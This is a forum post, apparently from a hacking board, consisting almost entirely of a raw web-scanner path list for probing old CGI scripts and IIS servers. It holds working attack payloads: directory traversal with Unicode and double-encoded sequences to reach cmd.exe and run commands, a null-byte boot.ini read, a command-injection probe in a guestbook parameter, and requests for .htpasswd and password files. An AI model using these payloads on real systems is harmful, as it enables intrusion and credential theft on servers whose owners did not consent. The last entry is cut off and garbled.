/servlet/com.unify.ewave.servletexec.UploadServlet
/servlet/file
/servlet/jsp/../../tst.txt
/servlet/psoft.hsphere.CP
/servlet/ssifilter/../../test.jsp
/servlet/test/pathInfo/test
/servlet/viewsource.jsp
/servlet/webacc?User.html=../../../../../../../../boot.ini%00
/session/adminlogin?RCpage=/sysadmin/index.stm
/session/admnlogin
/session/pagecount?page=
/showfile.asp
/$CSTBINDIR$/
/$CSTBINDIR$/..%%35%63../winnt/system32/cmd.exe?/c+dir
/$CSTBINDIR$/..%%35c../winnt/system32/cmd.exe?/c+dir
/$CSTBINDIR$/..%25%35%63../winnt/system32/cmd.exe?/c+dir
/$CSTBINDIR$/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\
/$CSTBINDIR$/..%252f../winnt/system32/cmd.exe?/c+dir
/$CSTBINDIR$/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/$CSTBINDIR$/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/$CSTBINDIR$/..%255c../winnt/system32/cmd.exe?/c+dir
/$CSTBINDIR$/..%2f../winnt/system32/cmd.exe
/$CSTBINDIR$/..%5c%5c../winnt/system32/cmd.exe
/$CSTBINDIR$/..%5c../winnt/system32/cmd.exe
/$CSTBINDIR$/..%c0%2f../winnt/system32/cmd.exe?/c+dir
/$CSTBINDIR$/..%c0%9v../winnt/system32/cmd.exe?/c+dir
/$CSTBINDIR$/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
/$CSTBINDIR$/..%c0%af../winnt/system32/cmd.exe?/c+dir
/$CSTBINDIR$/..%c0%qf../winnt/system32/cmd.exe?/c+dir
/$CSTBINDIR$/..%c1%1c../winnt/system32/cmd.exe?/c+dir
/$CSTBINDIR$/..%c1%8s../winnt/system32/cmd.exe?/c+dir
/$CSTBINDIR$/..%c1%9c../winnt/system32/cmd.exe?/c+dir
/$CSTBINDIR$/..%c1%pc../winnt/system32/cmd.exe?/c+dir
/$CSTBINDIR$/../../cmd.exe
/$CSTBINDIR$/..\\..\\..\\..\\..\\..\\winnt\system32\cmd.exe?/c+dir+c:\\
/$CSTBINDIR$/..../winnt/system32/cmd.exe
/$CSTBINDIR$/..../winnt/system32/cmd.exe
/$CSTBINDIR$/..../winnt/system32/cmd.exe
/$CSTBINDIR$/.cobalt/overflow/overflow.cgi
/$CSTBINDIR$/.cobalt/siteUserMod.cgi
/$CSTBINDIR$/.cobalt/siteUserMod/siteUserMod.cgi
/$CSTBINDIR$/.fhp
/$CSTBINDIR$/.htaccess
/$CSTBINDIR$/.htpasswd
/$CSTBINDIR$/.htpasswd/
/$CSTBINDIR$/.nsconfig
/$CSTBINDIR$/.www_acl
/$CSTBINDIR$/.wwwacl
/$CSTBINDIR$/AT-admin.cgi
/$CSTBINDIR$/AT-generate.cgi
/$CSTBINDIR$/Admin_files/order.log
/$CSTBINDIR$/AnyBoard.cgi
/$CSTBINDIR$/AnyForm
/$CSTBINDIR$/AnyForm2
/$CSTBINDIR$/Board/db/
/$CSTBINDIR$/Carello/add.exe
/$CSTBINDIR$/CatalogMgr.pl
/$CSTBINDIR$/Count.cgi
/$CSTBINDIR$/CrazyWWWBoard.cgi
/$CSTBINDIR$/Fpadmcgi.exe
/$CSTBINDIR$/GW5/GWWEB.EXE
/$CSTBINDIR$/GWWEB.EXE
/$CSTBINDIR$/IISADMPWD
/$CSTBINDIR$/LWGate
/$CSTBINDIR$/LWGate.cgi
/$CSTBINDIR$/MachineInfo
/$CSTBINDIR$/PGPMail.pl
/$CSTBINDIR$/Search.pl
/$CSTBINDIR$/Ultraboard.cgi
/$CSTBINDIR$/Ultraboard.pl
/$CSTBINDIR$/WS_FTP.ini
/$CSTBINDIR$/Web_Store/web_store.cgi
/$CSTBINDIR$/Xrun.cgi
/$CSTBINDIR$/YaBB.pl
/$CSTBINDIR$/_vti_cnf
/$CSTBINDIR$/a1disp3.cgi
/$CSTBINDIR$/a1stats/a1disp3.cgi
/$CSTBINDIR$/achievo/atk/javascript/class.atkdateattribute.js.php
/$CSTBINDIR$/ad.cgi
/$CSTBINDIR$/adcycle
/$CSTBINDIR$/add_ftp.cgi
/$CSTBINDIR$/adduser.cgi
/$CSTBINDIR$/adduser.htm
/$CSTBINDIR$/adduser.html
/$CSTBINDIR$/admentor/admin/admin.asp
/$CSTBINDIR$/admin
/$CSTBINDIR$/admin.cgi
/$CSTBINDIR$/admin.htm
/$CSTBINDIR$/admin.html
/$CSTBINDIR$/admin.php
/$CSTBINDIR$/admin.php3
/$CSTBINDIR$/admin.pl
/$CSTBINDIR$/admin/
/$CSTBINDIR$/admin/admin
/$CSTBINDIR$/admin/index.cgi
/$CSTBINDIR$/admisapi/fpadmin.htm
/$CSTBINDIR$/adp
/$CSTBINDIR$/adpassword.txt
/$CSTBINDIR$/ads.setup
/$CSTBINDIR$/ads/admentor/admin/admin.asp
/$CSTBINDIR$/af.cgi
/$CSTBINDIR$/aglimpse
/$CSTBINDIR$/alibaba.pl
/$CSTBINDIR$/alienform.cgi
/$CSTBINDIR$/allmanage.pl
/$CSTBINDIR$/allmanage/adp
/$CSTBINDIR$/allmanage/k
/$CSTBINDIR$/allmanage/settings.cfg
/$CSTBINDIR$/allmanage/userfile.dat
/$CSTBINDIR$/allmanageup.pl
/$CSTBINDIR$/alya.cgi
/$CSTBINDIR$/amlite/amadmin.pl
/$CSTBINDIR$/anacondaclip.pl
/$CSTBINDIR$/anacondaclip.pl?template=check
/$CSTBINDIR$/ans.pl
/$CSTBINDIR$/ans/ans.pl
/$CSTBINDIR$/apexec.pl
/$CSTBINDIR$/archie
/$CSTBINDIR$/architext_query.cgi
/$CSTBINDIR$/architext_query.pl
/$CSTBINDIR$/args.bat
/$CSTBINDIR$/args.cmd
/$CSTBINDIR$/ash
/$CSTBINDIR$/atk/javascript/class.atkdateattribute.js.php
/$CSTBINDIR$/auktion.cgi
/$CSTBINDIR$/auktion.pl
/$CSTBINDIR$/authorize/dbmfiles/users
/$CSTBINDIR$/awl/auctionweaver.pl
/$CSTBINDIR$/ax-admin.cgi
/$CSTBINDIR$/ax.cgi
/$CSTBINDIR$/axs.cgi
/$CSTBINDIR$/bash
/$CSTBINDIR$/bb-dnbd
/$CSTBINDIR$/bb-hist.sh
/$CSTBINDIR$/bb-hostsvc.sh
/$CSTBINDIR$/bb_smilies.php
/$CSTBINDIR$/bbs.pl%3F+.htr
/$CSTBINDIR$/bbs_forum.cgi
/$CSTBINDIR$/bigconf.cgi
/$CSTBINDIR$/bizdb1-search.cgi
/$CSTBINDIR$/bnbform
/$CSTBINDIR$/bnbform.cgi
/$CSTBINDIR$/boozt/admin/index.cgi
/$CSTBINDIR$/boozt/index.cgi
/$CSTBINDIR$/build.cgi
/$CSTBINDIR$/c32web.exe
/$CSTBINDIR$/c32web.exe/ChangeAdminPassword
/$CSTBINDIR$/c32web.exe/CheckError?error=53
/$CSTBINDIR$/c32web.exe/ShowAdminDir
/$CSTBINDIR$/c_download.cgi
/$CSTBINDIR$/cached_feed.cgi
/$CSTBINDIR$/cachemgr.cgi
/$CSTBINDIR$/cal_make.pl
/$CSTBINDIR$/calendar
/$CSTBINDIR$/calendar.php
/$CSTBINDIR$/calendar/calendar_admin.pl
/$CSTBINDIR$/calendar/calender.pl
/$CSTBINDIR$/calendar_admin.pl
/$CSTBINDIR$/calender.pl
/$CSTBINDIR$/calender_admin.pl
/$CSTBINDIR$/campas
/$CSTBINDIR$/carbo.dll
/$CSTBINDIR$/cart.pl
/$CSTBINDIR$/cart32.exe
/$CSTBINDIR$/cartman.php
/$CSTBINDIR$/cat
/$CSTBINDIR$/ceilidh.exe
/$CSTBINDIR$/cfgwiz.exe
/$CSTBINDIR$/cgi-lib.pl
/$CSTBINDIR$/cgicso
/$CSTBINDIR$/cgiemail
/$CSTBINDIR$/cgiemail-1.4/cgicso
/$CSTBINDIR$/cgiemail-1.6/cgicso
/$CSTBINDIR$/cgiemail/cgicso
/$CSTBINDIR$/cgiforum.pl
/$CSTBINDIR$/cgimail.exe
/$CSTBINDIR$/cgitest.exe
/$CSTBINDIR$/cgiwrap
/$CSTBINDIR$/changepw.cgi
/$CSTBINDIR$/changepw.exe
/$CSTBINDIR$/chat/calendar.php
/$CSTBINDIR$/check.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c%20dir%20C:\
/$CSTBINDIR$/check.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir
/$CSTBINDIR$/class/mysql.class
/$CSTBINDIR$/classified.cgi
/$CSTBINDIR$/classifieds
/$CSTBINDIR$/classifieds.cgi
/$CSTBINDIR$/clickresponder.pl
/$CSTBINDIR$/code.php
/$CSTBINDIR$/code.php3
/$CSTBINDIR$/com5.pl
/$CSTBINDIR$/commerce.cgi
/$CSTBINDIR$/commerce.cgi?page=check
/$CSTBINDIR$/common/FormMail.cgi
/$CSTBINDIR$/common/formmail.pl
/$CSTBINDIR$/common/formmail.pl.cgi
/$CSTBINDIR$/common/listrec.pl
/$CSTBINDIR$/common/user_update_admin.pl
/$CSTBINDIR$/common/user_update_passwd.pl
/$CSTBINDIR$/convert.bas
/$CSTBINDIR$/counter-ord
/$CSTBINDIR$/counter.exe
/$CSTBINDIR$/counterbanner
/$CSTBINDIR$/counterbanner-ord
/$CSTBINDIR$/counterfiglet
/$CSTBINDIR$/counterfiglet-ord
/$CSTBINDIR$/counterfiglet/nc/f
/$CSTBINDIR$/cpshost.dll
/$CSTBINDIR$/csh
/$CSTBINDIR$/cvsweb.cgi
/$CSTBINDIR$/cvsweb/cvsweb.cgi
/$CSTBINDIR$/dasp/fm_shell.asp
/$CSTBINDIR$/data/nicks
/$CSTBINDIR$/date
/$CSTBINDIR$/day5datacopier.cgi
/$CSTBINDIR$/day5datanotifier.cgi
/$CSTBINDIR$/db2www/library/document.d2w/show
/$CSTBINDIR$/dbman/db.cgi
/$CSTBINDIR$/dbmlparser.exe
/$CSTBINDIR$/dcadmin.cgi
/$CSTBINDIR$/dcboard.cgi
/$CSTBINDIR$/dcforum.cgi
/$CSTBINDIR$/dcforumlib.pl
/$CSTBINDIR$/dfire.cgi
/$CSTBINDIR$/dig.cgi
/$CSTBINDIR$/directory.php
/$CSTBINDIR$/directorypro.cgi
/$CSTBINDIR$/displayTC.pl
/$CSTBINDIR$/dmailweb.cgi
/$CSTBINDIR$/dmailweb.exe
/$CSTBINDIR$/dnewsweb
/$CSTBINDIR$/dnewsweb.cgi
/$CSTBINDIR$/dnewsweb.exe
/$CSTBINDIR$/donothing
/$CSTBINDIR$/download.cgi
/$CSTBINDIR$/dumpenv
/$CSTBINDIR$/dumpenv.pl
/$CSTBINDIR$/echo
/$CSTBINDIR$/echo.bat
/$CSTBINDIR$/echo.exe
/$CSTBINDIR$/edit.pl
/$CSTBINDIR$/edit_image.php
/$CSTBINDIR$/empower
/$CSTBINDIR$/empower?DB=UkRteamHole
/$CSTBINDIR$/emurl/RECMAN.dll
/$CSTBINDIR$/enter.cgi
/$CSTBINDIR$/environ.cgi
/$CSTBINDIR$/errors/needinit.php
/$CSTBINDIR$/eshop.pl
/$CSTBINDIR$/everythingform.cgi
/$CSTBINDIR$/ews
/$CSTBINDIR$/ews/ews/architext_query.pl
/$CSTBINDIR$/excite
/$CSTBINDIR$/ezshopper2/loadpage.cgi
/$CSTBINDIR$/ezshopper3/loadpage.cgi
/$CSTBINDIR$/faqmanager.cgi
/$CSTBINDIR$/faxsurvey
/$CSTBINDIR$/fi
/$CSTBINDIR$/filemail
/$CSTBINDIR$/filemail.pl
/$CSTBINDIR$/files.pl
/$CSTBINDIR$/finger
/$CSTBINDIR$/finger.cgi
/$CSTBINDIR$/finger.pl
/$CSTBINDIR$/flexform
/$CSTBINDIR$/flexform.cgi
/$CSTBINDIR$/form.cgi
/$CSTBINDIR$/formmail
/$CSTBINDIR$/formmail.cgi
/$CSTBINDIR$/formmail.pl
/$CSTBINDIR$/formmail.pl.cgi
/$CSTBINDIR$/fortune
/$CSTBINDIR$/forum/calendar.php
/$CSTBINDIR$/forums/calendar.php
/$CSTBINDIR$/forumz/calendar.php
/$CSTBINDIR$/fpcount.exe
/$CSTBINDIR$/fpexplorer.exe
/$CSTBINDIR$/fpremadm.exe
/$CSTBINDIR$/fpsrvadm.exe
/$CSTBINDIR$/ftp/ftp.pl
/$CSTBINDIR$/gH.cgi
/$CSTBINDIR$/gbook/gbook.cgi?_MAILTO=check;id
/$CSTBINDIR$/generate.cgi
/$CSTBINDIR$/get32.exe
/$CSTBINDIR$/getdoc.cgi
/$CSTBINDIR$/glimpse
/$CSTBINDIR$/global.cgi
/$CSTBINDIR$/guestbook.cgi
/$CSTBINDIR$/guestbook.pl
/$CSTBINDIR$/guestbook/
/$CSTBINDIR$/gupcgi.exe
/$CSTBINDIR$/handler
/$CSTBINDIR$/hello.bat
/$CSTBINDIR$/hsx.cgi
/$CSTBINDIR$/htforum/calendar.php
/$CSTBINDIR$/htgrep
/$CSTBINDIR$/htgrep.cgi
/$CSTBINDIR$/htimage.exe
/$CSTBINDIR$/htmldocs
/$CSTBINDIR$/htmlscript
/$CSTBINDIR$/htsearch
/$CSTBINDIR$/ibill/
/$CSTBINDIR$/ibillpm.pl
/$CSTBINDIR$/icat
/$CSTBINDIR$/iisadmin
/$CSTBINDIR$/iisadmin/bdir.htr
/$CSTBINDIR$/iisadmin/default.htm
/$CSTBINDIR$/iisadmin/ism.dll
/$CSTBINDIR$/iisadmin/samples
/$CSTBINDIR$/iisadmin/samples/ctgestb.htx
/$CSTBINDIR$/iisadmin/samples/ctgestb.idc
/$CSTBINDIR$/iisadmin/samples/details.htx
/$CSTBINDIR$/iisadmin/samples/details.idc
/$CSTBINDIR$/iisadmin/samples/query.htx
/$CSTBINDIR$/iisadmin/samples/query.idc
/$CSTBINDIR$/iisadmin/samples/register.htx
/$CSTBINDIR$/iisadmin/samples/register.idc
/$CSTBINDIR$/iisadmin/samples/sample.htx
/$CSTBINDIR$/iisadmin/samples/sample.idc
/$CSTBINDIR$/iisadmin/samples/sample2.htx
/$CSTBINDIR$/iisadmin/samples/viewbook.htx
/$CSTBINDIR$/iisadmin/samples/viewbook.idc
/$CSTBINDIR$/iisadmin/tools
/$CSTBINDIR$/iisadmin/tools/ct.htx
/$CSTBINDIR$/iisadmin/tools/ctss.idc
/$CSTBINDIR$/iisadmin/tools/dsnform.exe
/$CSTBINDIR$/iisadmin/tools/getdrvrs.exe
/$CSTBINDIR$/iisadmin/tools/mkilog.exe
/$CSTBINDIR$/iisadmin/tools/newdsn.exe
/$CSTBINDIR$/ikonboard/help.cgi
/$CSTBINDIR$/imagemap
/$CSTBINDIR$/imagemap.c
/$CSTBINDIR$/imagemap.exe
/$CSTBINDIR$/inc/sendmail.inc
/$CSTBINDIR$/includes/awol-condensed.inc.php
/$CSTBINDIR$/index.cgi
/$CSTBINDIR$/index.jsp
/$CSTBINDIR$/index.php
/$CSTBINDIR$/info2html
/$CSTBINDIR$/info2www
/$CSTBINDIR$/infogate
/$CSTBINDIR$/infosrch.cgi
/$CSTBINDIR$/input.bat
/$CSTBINDIR$/input2.bat
/$CSTBINDIR$/ipf/etc/gfw/ui/pwd.dat
/$CSTBINDIR$/jj
/$CSTBINDIR$/ksh
/$CSTBINDIR$/lasso.cgi
/$CSTBINDIR$/listrec.pl
/$CSTBINDIR$/loadpage.cgi
/$CSTBINDIR$/log
/$CSTBINDIR$/log/
/$CSTBINDIR$/login.cgi
/$CSTBINDIR$/login.pl
/$CSTBINDIR$/logs
/$CSTBINDIR$/logs/
/$CSTBINDIR$/ls
/$CSTBINDIR$/lsindex2.bat
/$CSTBINDIR$/mail
/$CSTBINDIR$/mailfile.cgi
/$CSTBINDIR$/mailform.pl
/$CSTBINDIR$/maillist.cgi
/$CSTBINDIR$/maillist.pl
/$CSTBINDIR$/mailnews.cgi
/$CSTBINDIR$/mailto.cgi
/$CSTBINDIR$/main.cgi
/$CSTBINDIR$/makechanges/easysteps/easysteps.pl
/$CSTBINDIR$/man.sh
/$CSTBINDIR$/mastergate
/$CSTBINDIR$/mastergate/.htpasswd
/$CSTBINDIR$/mastergate/password
/$CSTBINDIR$/mastergate/passwords
/$CSTBINDIR$/mdma.bat
/$CSTBINDIR$/message.cgi
/$CSTBINDIR$/meta.pl
/$CSTBINDIR$/minimal.exe
/$CSTBINDIR$/mlog.html
/$CSTBINDIR$/mlog.phtml
/$CSTBINDIR$/mmstdod.cgi
/$CSTBINDIR$/mmstdod.cgi?ALTERNATE_TEMPLATES=
/$CSTBINDIR$/modules.php
/$CSTBINDIR$/multihtml.pl
/$CSTBINDIR$/mylog.html
/$CSTBINDIR$/mylog.phtml
/$CSTBINDIR$/ncbook.cgi
/$CSTBINDIR$/ncbook/book.cgi
/$CSTBINDIR$/ncbook/ncbook.cgi
/$CSTBINDIR$/netauth.cgi
/$CSTBINDIR$/netstat
/$CSTBINDIR$/news/news.cgi
/$CSTBINDIR$/newsdesk.cgi
/$CSTBINDIR$/nlog-smb.cgi
/$CSTBINDIR$/nlog-smb.pl
/$CSTBINDIR$/no-such-file.pl
/$CSTBINDIR$/nph-error.pl
/$CSTBINDIR$/nph-maillist.pl
/$CSTBINDIR$/nph-publish
/$CSTBINDIR$/nph-publish.cgi
/$CSTBINDIR&#0 /cgi-bin/add.cgi
  Reply With Quote
Reply


Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 
Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Forum Jump



All times are GMT -4. The time now is 07:00 AM.


vBulletin skin developed by: Xisp.org Crew
Powered by vBulletin®
Copyright ©2000 - 2021, Jelsoft Enterprises Ltd.
2005 Copyright Xisp.org